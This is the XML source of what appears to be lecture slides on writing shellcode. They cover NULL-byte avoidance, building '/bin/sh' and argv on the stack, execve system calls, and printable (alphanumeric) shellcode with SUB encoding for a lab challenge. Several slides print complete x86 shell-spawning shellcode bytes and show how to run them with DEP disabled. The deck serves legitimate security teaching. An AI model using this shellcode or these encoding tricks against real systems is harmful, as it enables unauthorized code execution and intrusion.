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76735"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="125" d="100"/>
          <a:sy n="12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7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2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6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4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0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8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0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2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6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48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9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ium.googlesource.com/chromiumos/docs/+/master/constants/syscalls.m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6564-329B-AE42-9B31-AE2F7379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assembly into shellcode bytes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F5FA5B-9028-464C-955D-DCD1CF36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8329"/>
            <a:ext cx="10515600" cy="2638633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objcopy -S –O binary –j .text [in] [out]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>objcopy: Copy an object file’s information into an output file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-S: No debugging information included</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-O binary: Output format  is raw bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-j .text: Only include .text section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88545AE-E8CB-9A4A-8A02-129BF3E58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56"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="635000" y="1690688"/>
            <a:ext cx="1092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5373-866F-A742-932E-BD55A2AB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shellcode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33C07-5DC4-2E4D-AD77-EE64F05495C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1888758" y="1624404"/>
            <a:ext cx="8414483" cy="175432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shellcode[]</a:t>
            </a:r>
          </a:p>
          <a:p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\xb8\x01\x00\x00\x00\xbb\xd2\x04\x00\x00\xcd\x80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)())shellcode)();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E0CCBA0-A742-E545-8289-A5600A87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2290"/>
            <a:ext cx="10515600" cy="1341083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23FB92C-8F9E-A745-B96E-D455B1E0F1F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6867940" y="2501567"/>
            <a:ext cx="3435302" cy="1021208"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -81065"/>
              <a:gd name="adj2" fmla="val -117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Interpret the shellcode array as a function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A9EEDBC0-CE91-FC43-9ED9-FFD138479E57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4346713" y="5391318"/>
            <a:ext cx="6294783" cy="1021208"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -38583"/>
              <a:gd name="adj2" fmla="val -1207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 execstack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: Makes your data as executable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(i.e., Disable Data Execution Prevention, DEP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23823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84B5-B408-C846-B59C-D95349D0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exit(1234) shellcode (x86-64)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C47F5-F9D9-574B-8B11-F408B1ABBC4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606827" y="2060020"/>
            <a:ext cx="3217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.intel_syntax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noprefix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@function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A0A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SYS_exit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0D493-3532-714B-ADE9-CF5D345E355D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480846" y="2060020"/>
            <a:ext cx="3217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.intel_syntax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noprefix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@function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A0A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SYS_exit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24C4F-793A-2544-A537-7E5FC378CABE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2493607" y="5167312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x86 shellcode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F4F65-EC79-0D41-BD95-A63FD3D52746}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7205723" y="5167312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x86-64 shellcode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50282F-05FE-FC47-BDEE-0DA2AC5B8801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824374" y="4200939"/>
            <a:ext cx="153666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019372-3F0C-B747-9E22-304588F192D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824374" y="4472608"/>
            <a:ext cx="153666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DC8520-BF8F-0B49-966D-036CFCDF3261}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4824374" y="4731026"/>
            <a:ext cx="153666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5E24CE7-95B9-E349-AD2F-83B777759E51}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2186609" y="4333461"/>
            <a:ext cx="583096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AF7EB8-AD3F-FA46-AF6B-B9C24BB70560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7064572" y="4326836"/>
            <a:ext cx="583096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6915CC-FA2E-C84F-83BD-C698C6BFF4D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2796209" y="4035288"/>
            <a:ext cx="410817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51DC3-17F2-5B42-9CE8-7B034DE56839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7740433" y="4029505"/>
            <a:ext cx="410817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AF1F4-0C72-EA44-96AF-83FDC5396156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1606827" y="4605975"/>
            <a:ext cx="1189382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A6E250-6951-1F4C-9F13-642361805B6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6480846" y="4605975"/>
            <a:ext cx="1189382" cy="2517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7110-F2A1-8E47-9CB9-5AA1F21D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shellcode contains NULL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EACD-2ADC-5A47-B0DE-FC673A8B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541"/>
            <a:ext cx="10515600" cy="2651885"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NULL byte is introduced when a multi-byte integer is encoded as bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., 0x00000001 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> \x01\x00\x00\x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>Typical solution: XOR + sub-register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4EDF5-55CD-3544-BBAE-4871B26DB19B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089992" y="1703663"/>
            <a:ext cx="3217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SYS_exit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004D5-EDD0-5A49-A2C3-D15656AF5879}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792739" y="1703663"/>
            <a:ext cx="294183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\xb8\x01\x00\x00\x00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\xbb\xd2\x04\x00\x00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\xcd\x80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D408D-4E02-CE44-A135-B4312A9601D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413514" y="2165328"/>
            <a:ext cx="980661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78CE60-5708-6E4C-8B01-C9CB74CC1FD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1089992" y="4558456"/>
            <a:ext cx="4118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eax = 0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 = 0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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eax = 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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 = 1234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18B4D-57AC-A74D-8750-8BC07CAD0F86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6792739" y="4558456"/>
            <a:ext cx="2390398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\x31\xc0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\x89\xc3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\xb0\x01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\x66\xbb\xd2\x04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\xcd\x80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7D044A-30CD-2D48-B888-2171E270D465}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5413514" y="5366370"/>
            <a:ext cx="980661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EF72-A4BE-7E4C-8274-893123B4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more complicated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4C03F-EAC8-C14B-8C6F-C7B6050B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9147"/>
            <a:ext cx="10515600" cy="2227815"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q: How to make a string?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q: How to make an array?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2F03D-76CF-5F4E-8E90-43AB43071DA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3625376" y="1951672"/>
            <a:ext cx="4303643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"/bin/sh"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argv[]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{sh,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execve(sh, argv,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034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098A-DA7F-A040-A967-6765A90D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string (“/bin/sh”) in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C4E6-C45A-5042-B891-986153CD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= A sequence of byte ends with 0x00</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q: Which memory we will store a string?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A: stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> Program independent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6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1E29-3629-5F43-8FC8-DCF184E8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string (“/bin/sh”) in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CAF9-B9D1-C34D-A2A7-6ED84DDD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-&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make a string “/bin/sh\x00” in stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NOTE: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/>
              <a:t> instruction can insert only 4-bytes at most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eliminate a NULL byte?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solution: Make a string 4-byte aligned, and push them with a nullified register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A9797-288B-E94E-BE3F-BD088717828E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1288775" y="2999818"/>
            <a:ext cx="4118695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“/bin”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“/sh\x00”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64E06-E607-094A-80D2-63866C16955A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6202018" y="2999818"/>
            <a:ext cx="4118695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“/sh\x00”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“/bin”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D9B58E67-151C-104C-B933-226A7D172AAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2775436">
            <a:off x="4323004" y="2634716"/>
            <a:ext cx="1383143" cy="1376535"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 4661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C9BDF-C791-884D-BE1B-CBF66F8D3603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4176383" y="4950839"/>
            <a:ext cx="4118695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“n/sh”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“//bi”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3F90-42A8-C849-8730-95E0CD5E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string (“/bin/sh”) in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270C-642C-5B48-9ACE-8DD1B389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“//bin/sh” == [2f 2f 62 69] [6e 2f 73 68]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 them all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DEE3D-A3FF-9A4F-A896-9445EF57C050}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222512" y="2557381"/>
            <a:ext cx="4118695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0x6e2f7368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“n/sh”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0x2f2f6269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“//bi”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BC0DC-B902-DC42-8E26-65DEFCB2CED1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6294782" y="2557382"/>
            <a:ext cx="4118695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0x68732f6e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0x69622f2f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CC6803BB-86BE-C84C-BD5B-3FFD2E2E91DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2775436">
            <a:off x="4627803" y="2192277"/>
            <a:ext cx="1383143" cy="1376535"/>
          </a:xfrm>
          <a:prstGeom prst="plus">
            <a:avLst>
              <a:gd name="adj" fmla="val 4661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A8E65-839D-2846-8CA0-89629F58F177}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4036652" y="4587811"/>
            <a:ext cx="4656774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0x68732f6e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0x69622f2f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  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ebx=“/bin/sh”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A722B91-123E-E642-B5ED-4ECE6AA805A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8155347" y="3364775"/>
            <a:ext cx="3540149" cy="1325563"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -64386"/>
              <a:gd name="adj2" fmla="val 499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In tutorial, we will see another way to make string called jmp/call/pop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1752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3734-C474-F945-807D-F54927A3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 array ([”/bin/sh”, NULL]) in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ED78-732A-B340-AB09-67D7F5EA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= A sequence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s make an array in stack similar to string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1A0E1-1F09-7942-A0B4-A09ECC56642B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2949973" y="3429000"/>
            <a:ext cx="4656774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0x68732f6e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0x69622f2f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 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ebx=“/bin/sh”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D9AA3-3305-B347-9A61-06B42BB411BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2949973" y="5032375"/>
            <a:ext cx="4656774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   </a:t>
            </a:r>
          </a:p>
          <a:p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ecx={“/bin/sh”, NULL}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8959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C43B-6CA7-9749-B773-ABFBC210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them all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9A756-EA12-DE4C-B6D7-F1A3AF60A4CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1690688"/>
            <a:ext cx="5072270" cy="397031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0x68732f6e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0x69622f2f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 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ebx=“/bin/sh”</a:t>
            </a:r>
          </a:p>
          <a:p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   </a:t>
            </a:r>
          </a:p>
          <a:p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ecx={“/bin/sh”, NULL}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4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ebx=“/bin/sh”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	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eax=SYS_execve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0x80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5C0694-C43D-2B48-B4E8-AEDE78C4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31"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6587066" y="3429000"/>
            <a:ext cx="4174435" cy="11049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1D934EF-1B66-DC42-B1BA-D0C4583DF576}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797141" y="1167518"/>
            <a:ext cx="4556659" cy="1710808"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62516"/>
              <a:gd name="adj2" fmla="val 331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Remember! You need the previous header and main symbol declaration for compilation!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18FFA-7E00-B547-8458-95F6B7015544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6229259" y="4767152"/>
            <a:ext cx="542328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"\x31\xc0\x50\x68\x6e\x2f\x73\x68"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"\x68\x2f\x2f\x62\x69\x89\xe3\x50"</a:t>
            </a:r>
          </a:p>
          <a:p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"\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"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0606-DA1B-FA48-9CDB-C9309A2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E3CB-EA68-D143-B815-1F738026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what shellcode is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand how to write shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand how to invoke system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show how to make printable shellcode in high level</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2625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C300-318D-8D4A-A691-851AF2FF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restriction: Printable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258A-73FE-0943-9108-A5B7888E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Range: 0x20 -- 0x7f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previous strategy does not work anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replace an instruction with equivalent one</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>e.g., mov eax, 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>-&gt; xor eax, eax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Non-replaceable instructions exist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int 0x80  == “\xcd\x80”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syscall   == “\x0f\x05”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="140048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E94B-56A9-ED4E-A16D-A169660B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808"/>
            <a:ext cx="10515600" cy="5911920"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>https://web.archive.org/web/20110716082850/http://skypher.com/wiki/index.php?title=X64_alphanumeric_opcodes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70402F45-3C94-B242-AF72-2467FAB8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1139904"/>
            <a:ext cx="6249449" cy="5545818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1DB1DCD6-2723-C54B-8E65-A5C1E2C6AACE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7776762" y="1406057"/>
            <a:ext cx="3577039" cy="1710808"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62516"/>
              <a:gd name="adj2" fmla="val 331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NOTE: Your operands should be printable, too!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19136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87E0-A8AE-9147-8BBD-F95E9500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Decoding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7D8F-9CA3-C349-B04B-16DAE740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Printable shellcode</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	-&gt; Writes another shellcode to memory + jump (i.e., decoding)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How can we make arbitrary data using printable characters?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>One solution would be SUB encoding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0A59A-38A8-3045-BA4F-B686B5A4DEEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1540566" y="4223390"/>
            <a:ext cx="5072270" cy="92333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printable1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printable2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="88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printable3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71374AF-DE98-E645-AD01-A351EF4AB983}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6861838" y="4291316"/>
            <a:ext cx="4242959" cy="1710808"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -57206"/>
              <a:gd name="adj2" fmla="val 13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You can make arbitrary byte using THREE printable operands!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:b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Try this in your lab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  <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400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508A-1677-A341-AC1A-CBC09D0C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Remaining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1D70-A595-8245-B29A-5AB59264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Which memory will you use for writing shellcode?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q: How to write memory using printable characters?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Q: How to control your program counter after decoding?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Solve them all to solve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shellcode-ascii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> challenge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6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67C-8631-AB4F-8C7A-2284ABA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09BB-45EF-894C-96ED-7420A6E0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piece of code that is used as a part of exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Its name is originated from its typical job; spawning a shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, it can do other tasks (e.g., file read shellcode, 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D236-C3EE-274A-962B-418D66EFDE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1133967" y="3702800"/>
            <a:ext cx="4303643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"/bin/sh"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argv[]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{sh,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execve(sh, argv,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EB35C-40E2-9345-82DA-52F6A4B2CC19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6252000" y="3841298"/>
            <a:ext cx="445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\x31\xc0\x50\x68\x2f\x2f\x73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\x68\x68\x2f\x62\x69\x6e\x89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\xe3\x89\xc1\x89\xc2\xb0\x0b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\xcd\x80\x31\xc0\x40\xcd\x80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A784E-4B18-5043-A87E-BB828C30346F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5634014" y="4118298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910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127D-FC16-304C-A3A0-BCFE610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26A2-182B-0F4F-B9A2-68DC2FBB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write shellcode in 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17996-9940-0545-8E07-C9FD3ED48074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041202" y="2867913"/>
            <a:ext cx="4303643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"/bin/sh"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argv[]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{sh,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execve(sh, argv,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B23E48-D005-4B49-A318-B82663C6F0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44845" y="3606577"/>
            <a:ext cx="113546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51ED-11C2-CE4B-A3F1-C052B08477FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344845" y="31023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Compile</a:t>
            </a:r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72786D-03DC-FD47-AAD9-C7BDF9EA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3" y="2467395"/>
            <a:ext cx="5113613" cy="3755692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7D4F3E56-0413-B442-A65A-D05F79B3A627}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
